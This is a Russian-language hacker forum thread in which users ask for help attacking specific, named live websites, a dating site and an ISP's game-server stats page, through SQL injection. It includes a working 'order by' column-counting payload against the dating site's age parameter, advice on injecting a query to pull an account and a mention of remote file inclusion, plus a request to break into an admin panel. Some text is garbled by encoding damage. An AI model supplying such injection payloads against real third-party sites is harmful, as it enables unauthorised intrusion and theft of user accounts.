Зравсвуйте вот нашел сайтец http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&on line_only=1&search=1&age_start=1'&age_end=1&countr y=1 помогите пожалуйста пытаюсь подобрать кол-во полей ни как ни могу перечитал все статьи по sql инъекциям.

1 попробовать POST
2 дать линк

2^YaHoo^
http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&on line_only=1&search=1&age_start=1)))+order+by+1000+--+&age_end=1&country=1
дальше сам)

HI! что можно с этим сделать http://bf2.провайдер.ru/info/index.php?IP=1'&sort=points&port=29900&liteTag=som ething&mode=qr3&sort=points

Даже не знаю что посоветовать.

Попробуй так
http://bf2.провайдер.ru/тут/типо/линк/бажный_скрипт.php?IP=1+тут+вста вить+супер+пупер+ха керский+скуль+запрос+отсеч� �_комментарием_оставшуюс я_часть&sort=points&port=29900&liteTag=somet hing&mode=qr3&sort=points

Должен вывести аккаунт

Если не выйдет , пиши, будем пробовать "Удалённо_инклудовать_фа� �л" (с)

Прикольно обязательно попробую :-)

Всем привет, у меня такой вопрос, можно ли как нибудь попасть в админ панель.
Как я вижу, что авторизация проходит так: в БД ищется юзер с соответсвующем поролем из БД.
А дальше я понять не чего не могу

помогите пожалуйсто разобраться

Уязвимый скрипт у тебя... SQL-инъекция там..

mailbrush,можеш носом меня тыкнуть, где там уязвимость и как ей воспользоватся?